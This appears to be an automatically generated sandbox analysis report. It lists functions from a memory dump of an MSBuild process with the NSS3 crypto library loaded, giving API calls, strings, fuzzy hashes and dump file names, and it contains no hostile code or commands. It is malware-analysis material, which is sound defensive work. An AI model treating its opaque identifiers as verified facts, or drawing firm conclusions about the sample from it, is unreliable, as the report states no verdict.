Instruction ID: 47869354b4c7de44d1b56a180c1e97f8acd5f9601ebcd0b3ae6023ac622e7aa1
Opcode Fuzzy Hash: 6c88e3e632746098d102797c13408b1a088aa68b090a963023b8ce0505060deb
Instruction Fuzzy Hash: D6513B31E0F1458BEB01CAFA84907FF7BF59F8E348F188167E894A7A40D37599068799

Function 6C6BACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C6BACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6BAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BAD23

Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963

PR_LogPrint.NSS3(?,00000000), ref: 6C6BAD39

Strings

C_MessageDecryptFinal, xrefs: 6C6BACE1
hSession = 0x%x, xrefs: 6C6BACFE, 6C6BAD0E
nyl, xrefs: 6C6BAD51, 6C6BAD7B
(CK_INVALID_HANDLE), xrefs: 6C6BAD1C

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nyl
API String ID: 332880674-2485272832
Opcode ID: 31583dfbd0235a20572bcf052ae0fb37ed4721866527067eb187fe26ae243d55
Instruction ID: cd2d6bca48d29f1d0a6cc1685a3a6872810664872ed2d6def6ecdb81cd8088f4
Opcode Fuzzy Hash: 31583dfbd0235a20572bcf052ae0fb37ed4721866527067eb187fe26ae243d55
Instruction Fuzzy Hash: 55212F32600108DFD740DB54DD4DB5A37F5EB4A71DF044435E409A7612DF349919C79A

Function 6C6BA550 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptFinal), ref: 6C6BA576
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6BA5A4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BA5B3

Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963

PR_LogPrint.NSS3(?,00000000), ref: 6C6BA5C9

Strings

hSession = 0x%x, xrefs: 6C6BA58E, 6C6BA59E
nyl, xrefs: 6C6BA5E1, 6C6BA60B
C_MessageEncryptFinal, xrefs: 6C6BA571
(CK_INVALID_HANDLE), xrefs: 6C6BA5AC

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptFinal$nyl
API String ID: 332880674-3189223990
Opcode ID: dd46b249de4c0dddac083efe8aae1560562371b31b8ca4c5401056662dcd55ba
Instruction ID: 80cc8d892de61b94f60b3a9912c39ae4b3884f68d97f318df346f1d1c98791fb
Opcode Fuzzy Hash: dd46b249de4c0dddac083efe8aae1560562371b31b8ca4c5401056662dcd55ba
Instruction Fuzzy Hash: F9212C72601108DFD740DB54DE8CBAE37B5EB4A31DF044435E409ABA12DF349A59CB9A

Function 6C6CCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C6CCD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C6CCE16
PR_SetError.NSS3(00000000,00000000), ref: 6C6CD079

Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: ccbe20ccf4ed2edd58d4562bf4933927beca90d7baf4462b9e481be3f3ab577a
Instruction ID: 7205f69dbffd84e8fbb6a54eec0a4e03adbf2d1b2cf48160b65ca73b48815e61
Opcode Fuzzy Hash: ccbe20ccf4ed2edd58d4562bf4933927beca90d7baf4462b9e481be3f3ab577a
Instruction Fuzzy Hash: 81C1AFB1A002199BDB10DF28CC84BDAB7B4FF49308F1441A8E84997741E775EE95CF9A

Function 6C6765D0 Relevance: 13.8, APIs: 4, Strings: 5, Instructions: 261COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C67670B
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C672B2C), ref: 6C67675E
EnterCriticalSection.KERNEL32(?), ref: 6C67678E
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C672B2C), ref: 6C6767E1

Strings

@yl, xrefs: 6C67662B, 6C676809
Pyl, xrefs: 6C6768AA, 6C676944, 6C67696B
winUnmapfile1, xrefs: 6C676964
winUnmapfile2, xrefs: 6C67698B
winClose, xrefs: 6C6768C5

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: @yl$Pyl$winClose$winUnmapfile1$winUnmapfile2
API String ID: 3168844106-2562422158
Opcode ID: 2ce61b15128022ab41a024a0e9be60637c48e639eb7a90369934bc3e4649afd9
Instruction ID: 8097e7abb6780882eae9eea630cd33053333a5b5c7cf4b29627477cb3462e38c
Opcode Fuzzy Hash: 2ce61b15128022ab41a024a0e9be60637c48e639eb7a90369934bc3e4649afd9
Instruction Fuzzy Hash: F8A1B036B01210CFDF59AF64E989A6A3771BF0A319F14487CE906CB640DB34ED41CBA6

Function 6C682C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(801FEDA6), ref: 6C682C5D

Part of subcall function 6C6E0D30: calloc.MOZGLUE ref: 6C6E0D50
Part of subcall function 6C6E0D30: TlsGetValue.KERNEL32 ref: 6C6E0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C682C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C682CE0

Part of subcall function 6C682E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C682CDA,?,00000000), ref: 6C682E1E
Part of subcall function 6C682E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C682E33
Part of subcall function 6C682E00: TlsGetValue.KERNEL32 ref: 6C682E4E
Part of subcall function 6C682E00: EnterCriticalSection.KERNEL32(?), ref: 6C682E5E
Part of subcall function 6C682E00: PL_HashTableLookup.NSS3(?), ref: 6C682E71
Part of subcall function 6C682E00: PL_HashTableRemove.NSS3(?), ref: 6C682E84
Part of subcall function 6C682E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C682E96
Part of subcall function 6C682E00: PR_Unlock.NSS3 ref: 6C682EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C682D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C682D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C682D3F
free.MOZGLUE(00000000), ref: 6C682D73
CERT_DestroyCertificate.NSS3(?), ref: 6C682DB8
free.MOZGLUE ref: 6C682DC8

Part of subcall function 6C683E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C683EC2
Part of subcall function 6C683E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C683ED6
Part of subcall function 6C683E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C683EEE
Part of subcall function 6C683E60: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C683F02
Part of subcall function 6C683E60: PL_FreeArenaPool.NSS3 ref: 6C683F14
Part of subcall function 6C683E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C683F27

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: b3a42378588d3d7ce929db1562aa663168b0baf1de71e66ab0a6b093d8d638fb
Instruction ID: 9d191427ffec77d68878b72e74e206556b08efb866666db4b369efbd19389800
Opcode Fuzzy Hash: b3a42378588d3d7ce929db1562aa663168b0baf1de71e66ab0a6b093d8d638fb
Instruction Fuzzy Hash: F051E071A063119BEB00DE28CC88B6B7BE5EF84308F14083CEC5593750EB31E815CBAA

Function 6C69E400 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E432
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E44F

Part of subcall function 6C6A2C40: TlsGetValue.KERNEL32(#?jl,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C62
Part of subcall function 6C6A2C40: EnterCriticalSection.KERNEL32(0000001C,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C76
Part of subcall function 6C6A2C40: PL_HashTableLookup.NSS3(00000000,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C86
Part of subcall function 6C6A2C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C93

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E494
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E4AD
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E4D6
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E52F

Strings

#?jl, xrefs: 6C69E409

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID: #?jl
API String ID: 3106257965-1742918463
Opcode ID: a1b496d22b80da148d2118c3d7eccd96356c2d4f2f99861a815c7229c2b191ae
Instruction ID: 2e3f77267cd77d3698f8cdad911f512398be02cc54f8ca83c246e42d9d3b17e2
Opcode Fuzzy Hash: a1b496d22b80da148d2118c3d7eccd96356c2d4f2f99861a815c7229c2b191ae
Instruction Fuzzy Hash: 9C4119B5A04A06CFCB00EF78D58456ABBF0FF05304F054969D8859B711EB34E885CBEA

Function 6C698CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C6A124D,00000001), ref: 6C698D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C6A124D,00000001), ref: 6C698D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C6A124D,00000001), ref: 6C698D73
PR_Unlock.NSS3(?,?,?,?,?,6C6A124D,00000001), ref: 6C698D8C

Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C6A124D,00000001), ref: 6C698DBA

Strings

KRAM, xrefs: 6C698D3E
KRAM, xrefs: 6C698CF9

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: b11148c615d70a37aa4c5ddc011eaf5c1320b2fca4698df8b11da88f4ebd8068
Instruction ID: 00bda46c609be1fc33b0dafe994031e63c6ec255a796be76903055746fb15cb6
Opcode Fuzzy Hash: b11148c615d70a37aa4c5ddc011eaf5c1320b2fca4698df8b11da88f4ebd8068
Instruction Fuzzy Hash: 6521A1B1A046028FDB00EF38C58959AB7F0FF59318F15897AD89887721EB34E846CB95

Function 6C754D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C754DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C754DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C754DCB
invalid, xrefs: 6C754DB8
API call with %s database connection pointer, xrefs: 6C754DBD
%s at line %d of [%.10s], xrefs: 6C754DDA
misuse, xrefs: 6C754DD5

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: d09cff228c093946cb66d5e4164b99be3e2669d7b0fe9827b1f02dad02da6809
Instruction ID: 2d7234256ea6d033786c5dcaf58da5db117a0d26562d965c3edfe2839475b54c
Opcode Fuzzy Hash: d09cff228c093946cb66d5e4164b99be3e2669d7b0fe9827b1f02dad02da6809
Instruction Fuzzy Hash: C4F02422A047282BD6004616CF12F9633594F02328F8619B0FF087BB52DE16A9709285

Function 6C754DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C754E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C754E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C754E38
invalid, xrefs: 6C754E25
API call with %s database connection pointer, xrefs: 6C754E2A
%s at line %d of [%.10s], xrefs: 6C754E47
misuse, xrefs: 6C754E42

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 6b483051520233ab465218c77ba953df63ad886908b6e2cd0ae4c797d76925cb
Instruction ID: c82198176f591c45ce1dd238b6aa55c99bbd2e7a91e8f52f5818d824e45d613a
Opcode Fuzzy Hash: 6b483051520233ab465218c77ba953df63ad886908b6e2cd0ae4c797d76925cb
Instruction Fuzzy Hash: D8F09711F448282BE60006228F14F83339D4B02329F8864F0FE0937F82CE169A7012D5

Function 6C6C0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?,?,00000000,?,?), ref: 6C6C0CB3

Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?), ref: 6C6C0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?), ref: 6C6C0DEC

Part of subcall function 6C6E0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C682AF5,?,?,?,?,?,6C680A1B,00000000), ref: 6C6E0F1A
Part of subcall function 6C6E0F10: malloc.MOZGLUE(00000001), ref: 6C6E0F30
Part of subcall function 6C6E0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6E0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?), ref: 6C6C0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000), ref: 6C6C0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?), ref: 6C6C0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?,?,00000000), ref: 6C6C0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?), ref: 6C6C0E79

Part of subcall function 6C6D1560: TlsGetValue.KERNEL32(00000000,?,6C6A0844,?), ref: 6C6D157A
Part of subcall function 6C6D1560: EnterCriticalSection.KERNEL32(?,?,?,6C6A0844,?), ref: 6C6D158F
Part of subcall function 6C6D1560: PR_Unlock.NSS3(?,?,?,?,6C6A0844,?), ref: 6C6D15B2

Part of subcall function 6C69B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C6A1397,00000000,?,6C69CF93,5B5F5EC0,00000000,?,6C6A1397,?), ref: 6C69B1CB
Part of subcall function 6C69B1A0: free.MOZGLUE(5B5F5EC0,?,6C69CF93,5B5F5EC0,00000000,?,6C6A1397,?), ref: 6C69B1D2

Part of subcall function 6C6989E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6988AE,-00000008), ref: 6C698A04
Part of subcall function 6C6989E0: EnterCriticalSection.KERNEL32(?), ref: 6C698A15
Part of subcall function 6C6989E0: memset.VCRUNTIME140(6C6988AE,00000000,00000132), ref: 6C698A27
Part of subcall function 6C6989E0: PR_Unlock.NSS3(?), ref: 6C698A35

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 4773273922a4eaa360bab9967a78b129a5f64bee6ee2d65ab0596c8bb77bb487
Instruction ID: bc69551b0ad29dfd861c6d5f3230345e5519d7f266b0563e955ff7867007c912
Opcode Fuzzy Hash: 4773273922a4eaa360bab9967a78b129a5f64bee6ee2d65ab0596c8bb77bb487
Instruction Fuzzy Hash: 8951A6F6E002056FEB009F64DC85AAB37A8EF49718F150064ED0997712FB31FD1986AB

Function 6C6D2470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C6D2D7C,6C6A9192,?), ref: 6C6D248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6C6D24A2
memset.VCRUNTIME140(6C6D2D7C,00000020,6C6D2D5C), ref: 6C6D250E
memset.VCRUNTIME140(6C6D2D9C,00000020,6C6D2D7C), ref: 6C6D2535
memset.VCRUNTIME140(?,00000020,?), ref: 6C6D255C
memset.VCRUNTIME140(?,00000020,?), ref: 6C6D2583
PR_Unlock.NSS3(?), ref: 6C6D2594
PR_SetError.NSS3(00000000,00000000), ref: 6C6D25AF

Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 1c6b31b422ce83bd54102749ffe3d768602727f1dcae1a28da1a33386fc87940
Instruction ID: d1ca7ceaf5bd55138e78f063411d7828a081cdc1fb53c4cd6d572725b9a364ec
Opcode Fuzzy Hash: 1c6b31b422ce83bd54102749ffe3d768602727f1dcae1a28da1a33386fc87940
Instruction Fuzzy Hash: FC4100B1E102059BEB009F34DC9CBAA3774BB99309F160A68EC05D7A52F770FA94C295

Function 6C6D05A0 Relevance: 12.1, APIs: 8, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000), ref: 6C6D05DA

Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15

TlsGetValue.KERNEL32(00000000), ref: 6C6D060C
EnterCriticalSection.KERNEL32 ref: 6C6D0629
TlsGetValue.KERNEL32(00000000), ref: 6C6D066F
EnterCriticalSection.KERNEL32 ref: 6C6D068C
PR_Unlock.NSS3 ref: 6C6D06AA
PK11_GetNextSafe.NSS3 ref: 6C6D06C3
PR_Unlock.NSS3 ref: 6C6D06F9

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

